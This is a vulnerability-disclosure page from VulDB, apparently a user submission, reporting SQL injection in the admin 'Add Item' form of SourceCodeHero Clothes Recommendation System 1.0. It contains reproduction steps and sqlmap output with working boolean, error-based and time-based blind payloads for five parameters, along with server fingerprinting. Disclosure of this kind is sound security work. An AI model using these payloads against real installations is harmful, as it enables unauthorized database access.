Soumettre #427443: SourceCodeHero Clothes Recommendation System - Add Item V1.0 SQL Injectioninformation

TitreSourceCodeHero Clothes Recommendation System - Add Item V1.0 SQL Injection
Description would like to report a SQL injection vulnerability I discovered in SourceCodeHero - Clothes Recommendation System during my testing. Details: Affected URL/Endpoint: /Online_Shopping/admin/home.php?con=add Vulnerable Parameter: ''cat', 'subcat',' t1' ',t2','text' Risk Level: High (allows malicious users to execute arbitrary SQL queries) Steps to reproduce: 1) Login as admin via /online_shopping/admin 2) Navigate to 'Add Item' 3) Fill up the details 4) Use a proxy like burpsuite to intercept the request. 5) Input the payload to invoke the SQL injection. sqlmap resumed the following injection point(s) from stored session: ------------------------------------------------------------------------------------------------------------------------------ Parameter: MULTIPART t1 ((custom) POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="t1" 1234' AND ELT(7341=7341,1544) AND 'BOKW'='BOKW Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="t1" 1234' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(3483=3483,1))),0x71706a7a71),3483) AND 'LNkk'='LNkk Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="t1" 1234' AND (SELECT 9701 FROM (SELECT(SLEEP(5)))Mixp) AND 'AOrS'='AOrS ------------------------------------------------------------------------------------------------------------------------------ Parameter: MULTIPART cat ((custom) POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="cat" 1' AND ELT(9427=9427,9623) AND 'EvWs'='EvWs Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="cat" 1' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(2341=2341,1))),0x71706a7a71),2341) AND 'SfGX'='SfGX Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="cat" 1' AND (SELECT 2614 FROM (SELECT(SLEEP(5)))xQXD) AND 'WFzI'='WFzI ------------------------------------------------------------------------------------------------------------------------------ Parameter: MULTIPART t2 ((custom) POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="t2" 1234' AND ELT(4970=4970,9601) AND 'WkWf'='WkWf Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="t2" 1234' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(3895=3895,1))),0x71706a7a71),3895) AND 'BMME'='BMME Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="t2" 1234' AND (SELECT 7807 FROM (SELECT(SLEEP(5)))Xqnm) AND 'yDBc'='yDBc ------------------------------------------------------------------------------------------------------------------------------ Parameter: MULTIPART subcat ((custom) POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="subcat" 1' AND ELT(3810=3810,8721) AND 'lkzy'='lkzy Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="subcat" 1' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(7334=7334,1))),0x71706a7a71),7334) AND 'OTYk'='OTYk Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="subcat" 1' AND (SELECT 8488 FROM (SELECT(SLEEP(5)))WtQj) AND 'LoqE'='LoqE ------------------------------------------------------------------------------------------------------------------------------ Parameter: MULTIPART text ((custom) POST) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="text" tessst'||(SELECT 0x746a6c59 WHERE 2287=2287 AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(9743=9743,1))),0x71706a7a71),9743))||' Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundary9fLy0m0JK4qh9FWl ------WebKitFormBoundary9fLy0m0JK4qh9FWl Content-Disposition: form-data; name="text" tessst'||(SELECT 0x4a59544d WHERE 5411=5411 AND (SELECT 3006 FROM (SELECT(SLEEP(5)))dZOK))||' ------------------------------------------------------------------------------------------------------------------------------ [13:15:04] [INFO] testing MySQL [13:15:05] [WARNING] reflective value(s) found and filtering out [13:15:05] [INFO] confirming MySQL [13:15:05] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.59, PHP 8.2.18 back-end DBMS: MySQL >= 8.0.0 Please let me know if you need further information or a more detailed analysis.
Utilisateur
 Delvy (UID 74555)
Soumission21/10/2024 07:24 (il y a 2 ans)
Modérer24/10/2024 12:48 (3 days later)
StatutAccepté
Entrée VulDB281682 [SourceCodeHero Clothes Recommendation System 1.0 /admin/home.php?con=add cat/subcat/ t1/t2/text injection SQL]
Points17

PrécédentAperçuSuivant

Might our Artificial Intelligence support you?

Check our Alexa App!